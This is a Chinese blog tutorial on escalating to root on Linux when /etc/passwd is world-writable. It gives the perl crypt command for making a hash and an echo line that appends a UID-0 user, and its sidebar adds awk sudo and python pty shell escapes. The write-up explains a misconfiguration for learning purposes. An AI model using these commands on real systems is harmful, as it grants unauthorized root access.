Linux配置错误提权之利用/etc/passwd文件

已于 2022-03-21 09:49:41 修改
阅读量3.1k 收藏 6
点赞数 1
分类专栏: 内网攻防 文章标签: linux提权 /etc/passwd提权
于 2021-11-01 14:16:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/121078898
版权

接下来我们的提权是利用 /etc/passwd 文件的可写入权限,导致我们写入一个其他用户进去。

1. 查看/etc/passwd文件信息

首先,查看 /etc/passwd 的权限,发现任何用户都可以读写。为了实验需要我们这里给其他用户加入一个可写权限

 

关于linux 下文件权限 ——> https://segmentfault.com/a/1190000039202476

 /ect/passwd

/etc/passwd,保存了操作系统中所有用户的信息,具体的字段信息 —> /etc/passwd文件中字段解释

root:x:0:0:root:/root:/bin/bash

2. 生成密码信息

我们现在要做的就是自己构造一个用户,在密码占位符处指定密码,并且UID设置为0,将其添加到 /etc/passwd 文件中。

首先,使用perl语言(Linux自带)生成带有盐值的密码:

perl -le 'print crypt("123456","addedsalt")'

3. 假设获取了一个低权限shell

我们切换到一个普通用户,假装获取了一个低权限用户。然后执行下面这条命令,成功将test用户的信息加入 /etc/passwd 文件

echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >>/etc/passwd

查看passwd字段可知,成功加入

4. 登录新用户 

以用户名:test  密码: 123456 成功进行切换,直接获取了root权限

 

总结

这个权限提升的前提是,/etc/passwd字段其他用户有写的权限,但是默认只有root可写,所以也是由于配置错误导致的漏洞发生。 

Vibe~
关注
专栏目录
Linux 系统中etc/passwd文件详解
鹅不糊涂的博客
05-20 1万+
Linux 系统中的/etc/passwd文件是一个非常重要的文件,它保存了系统上所有用户的账户信息。初学者需要了解该文件的结构和内容,以便更好地管理用户账户和权限。本文将为您介绍/etc/passwd文件的概述,帮助您更好地理解Linux系统
Linux——/etc/passwd文件(管理用户和组)
hutongkoudemihu的博客
06-25 5051
Linux系统是多用户多任务的分时操作系统,要能做到不同的用户能同时访问不同的文件,允许不同的用户从本地登录或远程登录,这时用户必须拥有一个合法的账号,Linux系统正是通过账号来实现对用户的访问进行控制的,因此,需要对用户与组进行有效的管理。用户的账号一方面能帮助系统管理员对使用系统的用户进行跟踪,并控制他们对系统资源的访问;另一方面也能帮助用户组织文件,并为用户提供安全性保护。每个用户账号都拥有一个唯一的用户名和用户口令。用户在登录时键入正确的用户名和口令后,才能进入系统和自己的主目录。
Linux配置不当提权-suid提权
孤的博客
09-14 1668
攻击成功,并得到一个shell,但是这里却只是一个简单的shell,首先需要把它转换为一个交互式的shell 在简单shell中直接按删除键是不行的,要按住ctrl键之后,再按住删除键才可以,其他键的使用也一样 命令 python -c 'import pty;pty.spawn("/bin/bash")' 现在已经进入了一个交互的shell了,但是可以看到这只是一个普通的用户,所以我们要把他提...
Linux提权Linux 配置问题导致提权
qq_38989921的博客
03-23 357
一、首先简单介绍一下Linux sudo 命令: linux sudo命令以系统管理者的身份执行指令,在/etc/sudoers中出现的使用者可使用sudo指令。 普通用户可以通过sudo -l 查看自己是否可以使用sudo命令以及具体权限。 利用/bin/ash查看shadow文件 利用/usr/bin/awk获取shell sudo /usr/bin/awk ‘BEGIN {system("/bin/bash")}’ /usr/bin/curl提权 利用/usr/bin/find获取shell
Linux笔记——/etc/passwd文件
weixin_42638731的博客
01-05 1776
Linux笔记——/etc/passwd文件
linux etc passwd权限,Linux中/etc/passwd配置文件详解
weixin_31205797的博客
04-29 2500
原标题:Linux中/etc/passwd配置文件详解/etc/passwd文件:系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读(r)操作。 查看文件内容: /etc/passwd文件内容非常规律,每行记录对应一个用户。每行用户信息都以":"作为分隔符,划分为7个字段。如下图各个字段含义: 下面逐个介绍一下:0 1用户用户名仅是为了方便用户记忆。Linux系统...
linux提权~利用 /etc/passwd 文件
@小张小张的博客
09-27 6105
linux提权~利用 /etc/passwd 文件提权利用 /etc/passwd 文件的可写入权限,我们可以写入一个其他用户进去。 1.查看 /etc/passwd 的权限 首先,查看 /etc/passwd 的权限,发现任何用户都可以执行读写权限。 命令: ls -lh /etc/passwd 文件权限的查看 使用 ls -lh 可以查看文件的具体信息,其中包括不同的用户对该文件的权限 (字符每3个一组(rwx),读(r)、写(w)、执行(x)) 2.记录行的基本属性 Lin
Linux 初识/etc/passwd和/etc/shadow
01-09
20.3.8 小白学习日记三:/etc/.../etc/passwd文件: [root@mling ~]# cat /etc/passwd | head root: x:0:0:root:/root:/bin/bash bin: x:1:1:bin:/bin:/sbin/nologin daemon: x:2:2:daemon:/sbin:/sbin/nologin
linux下 修改/etc/passwd文件添加用户要点,linux下添加删除,修改,查看用户用户组...
weixin_42405368的博客
05-01 3189
一、组操作1、创建组:groupadd test #增加一个test组2、修改组groupmod -n test2 test #将test组的名子改成test23、删除组groupdel test2 #删除 组test24、查看组a),查看当前登录用户所在的组groups,查看apacheuser所在组groups apacheuserb),查看所有组cat /etc/groupc...
linux 查看/etc/passwd 命令 详细
z1zyy的博客
04-19 8570
使用vim /etc/passwd 进入查看 6个分号分成了7段 第一段:用户名 第二段:口令(密码段) 第三段:用户ID号 //0:特殊用户 1~499 系统用户 1000+ 普通用户 第四段:组ID号 第五段:注释描述 //如小组里的manager 第六段:主目录 第七段:登陆命令解释器,不允许使用shell的一般使用nologin ...
Unix/Linux编程:查看/etc/passwd、/etc/group、/etc/shadow
OceanStar的博客
12-17 2831
理论 Unix系统的正常运行需要使用大量与系统有关的数据文件,例如:口令文件/etc/passwd以及组文件/etc/group就是经常被多个程序频繁使用的两个文件用户每次登陆Unix系统,以及每次实现ls -l命令时都需要使用口令文件 Unxi系统口令文件包含了如下所示各字符,这些字段包含在<pwd.h>定义的passwd结构中 Unix的口令文件是/etc/passwd,而且是一个ASCII文件(:分隔) 下面可以通过用户登录名或者uid查询相关项目 #include <pw
/etc/passwd: 权限不够
cornerlin的博客
12-16 9002
/etc/passwd不是可执行文件,而是系统密码文件,是个ascii码文件,可以用vi、cat打开查看可执行的是/usr/bin/passwd或直接passwd修改密码 passwd的绝对路径在/usr/bin/passwd
Linux中/etc下面passwd和shadow文件介绍
最新发布
m0_72731342的博客
03-26 1251
SYS_GID_MAX(number),SYS_GID_MIN(number) useradd、groupadd或newusers创建的系统组的组ID范围。SYS_UID_MAX(number),SYS_UID_MIN(number) useradd或newusers创建的系统用户用户ID的范围。3.用户UID值,一般情况下,root的UID为0,1-499默认为系统账号,有的更大些到1000,500-65535为用户的可登录账号,有的系统从1000开始。如果不指定,就假定为-1,这会禁用此限制。
Linux提权—/etc/passwd
qq_40898302的博客
04-11 3517
linxu提权
linux的root账户登录在终端输入etc/password提示权限不够
m0_61892132的博客
01-17 2372
root账户终端输入etc/password提示权限不够
/etc/passwd详解
热门推荐
xiaohaier8593的博客
12-28 1万+
(1)/etc/passwd保存了所有用户的用于读取的必要信息,包括用户的①名称②登录口令情况③用户ID④所属组ID⑤用户的全称等其它详细信息⑥用户的home目录⑦用户的默认登录shell。未使用修改密码的命令,而是直接用超级用户权限删除了/etc/passwd中登录口令列的“x”,那么该行用户登录时将不在需要口令密码。(2)每行以6个“:”分隔为7个部分,从左到右依次为用户的①名称②登录口令情况③用户ID④所属组ID⑤用户的全称等其它详细信息⑥用户的home目录⑦用户的默认登录shell。
设计一个程序,要求利用read函数读取系统文件“/etc/passwd”并在终端上显示输出。
qq_52974786的博客
11-24 1514
问题描述 设计一个程序,要求利用read函数读取系统文件“/etc/passwd”并在终端上显示输出。 大致思路 首先应当以只读方式打开该系统文件,其次再使用fread函数将其读取到终端上。 整体代码 #include<stdio.h> #include<stdlib.h> int main() { FILE *fp; char buff[1024]; fp=fopen("/etc/passwd","r"); fread(buff,sizeof(char),1024,fp
编辑/etc/passwd文件进行权限升级的技巧
weixin_30632089的博客
03-10 1655
0x00 前言 在本文中,我们将学习“修改/etc/passwd文件以创建或更改用户的root权限的各种方法”。有时,一旦目标被攻击,就必须知道如何在/etc/passwd文件中编辑自己的用户以进行权限升级,其中我们将此技巧应用于权限提升。打开下面给出的链接: 链接1:Hack the Box Challenge: Apocalyst Walkthrough 链接2:Hack the Hac...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vibe~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值